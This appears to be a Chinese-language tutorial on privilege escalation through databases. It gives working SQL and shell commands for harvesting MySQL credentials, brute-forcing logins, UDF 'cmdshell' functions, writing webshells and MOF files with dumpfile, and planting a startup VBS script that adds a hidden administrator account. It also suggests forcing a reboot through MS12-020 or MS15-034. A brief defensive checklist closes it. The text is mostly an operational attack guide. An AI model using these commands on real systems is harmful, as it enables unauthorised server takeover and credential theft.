一、如何获取mysql账号密码

1.查看网站配置文件

如：conn、config、data、sql、common、inc等

2.查看user.myi

数据库安装路径下的mysql文件安装目录为/data/mysql/user.myd

3.通过暴力破解（hscan、bruter、hydra、脚本木马）

bruter在vstar5的破解工具里面

mysql允许远程连接的情况下，才可以暴力破解。或者大马暴力破解

登录到mysql中，为root进行远程访问的授权

mysql>GRANT ALL PRIVILEGES ON *.* tO root@"%" IDENTIFIED BY "root";

mysql>flush privileges;

暴力破解（Bruter要放在全英文路径下）

4.通过查询语句

select user from user order by 1 desc limit 0,10（查询用户名）

Select password from user order by 1 desc limit 0,10（查询密码）

二、UDF提权（自身功能提权，内联脚本提权）

udf是mysql给用户进行扩展的一个文件

mysql版本小于5.1路径：

c:\window\udf.dll或者c:\windows\system32\udf.dll(默认安装mysql自动就在这个路径里面

mysql版本等于5.1路径：

MYSQL\bin\plugin\udf.dll

以下说明mysql不可以写文件

执行udf提权失败

1.Mysql综合利用工具

SQL命令：Create Function cmdshell returns string soname 'udf.dll'

#删除自定义函数DROP FUNCTION function_name

5.7版本之后只默认一个路径可以写文件，不过system可以直接执行命令

可以通过union select 来利用load_file或者dumpfile或者outfile向绝对路径目录写webshell

拿到webshell可以连接数据库，能够写文件的话，利用udf提权

参考：https://www.cnblogs.com/sijidou/p/10522972.html

2.上传moon.php提权数据库

1.上传moon.php

2.浏览器访问

导出失败

解决方法如下

mysql配置文件添加secure-file-priv=""重启服务即可

导出成功

注：有读写权限才可以进行提权操作

三、mof漏洞提权

mysql必须支持远程连接，否则运行不了

1.上传mof文件

上传mof文件

2.用mysql提权工具或者菜刀执行SQL:

select

load_file('C:\\wmpub\\moon.mof')

into dumpfile

'c:/windows/system32/wbem/mof/moon.mof';

每隔五秒执行一次添加账号

解决办法：

第一 net stop winmgmt 停止服务，

第二删除文件夹：C:\WINDOWS\system32\wbem\Repository\

第三 net start winmgmt 启动服务

第四：完毕不会在执行了。

四、mysql启动项提权

C:\php\MySQL-5.1.50\bin>mysql -uroot -proot -h192.168.1.109

mysql>drop database test1;

mysql> create database test1;

mysql> use test1;

mysql> create table a (cmd text);

mysql>insert into a values ("set wshshell=createobject (""wscript.shell"")");

mysql>insert into a values ("a=wshshell.run (""cmd.exe /c net user

best best /add"",0)");

mysql>insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators best

/add"",0)");

注意双引号和括号以及后面的“0”一定要输入！我们将用这三条命令来建立一个VBS的脚本程序！

mysql>select * from a;

mysql>select * from a into outfile

"c://docume~1//administrator//「开始」菜单//程序//启动//best.vbs";

最后通过溢出漏洞让服务器重启，如：MS12-020、MS15-034，自动就开始执行VBS的脚本程序，添加了best 账号和密码

五、MSSQL提权

mssql提权主要分为弱口令与溢出两类提权。目前主要通过弱口令连接直接提权，溢出类Mssql数据库几乎很少见。

直接利用vstar其他工具里面的sqlTools和sql两个工具进行提权操作

六、ORACLE提权

Oracle数据库一般与jsp、aspx网站搭配，如果是jsp网站，默认是系统权限，apsx网站默认需要提权。提权方法参考如下地址:https://blog.csdn.net/sezvboyrul/article/details/2855401

利用oracleshell.jar工具

七、安全防御

1、限止数据库远程连接，给数据库帐户设置密码必须>8位以上并数字+字母+特殊符号等。

2、不要给网站配置root或SA权限。必须给每个网站独立分配数据库帐户并限格控制好权限。

3、及时升级数据库补丁。

4、安装Waf进行防御。

数据库权限提升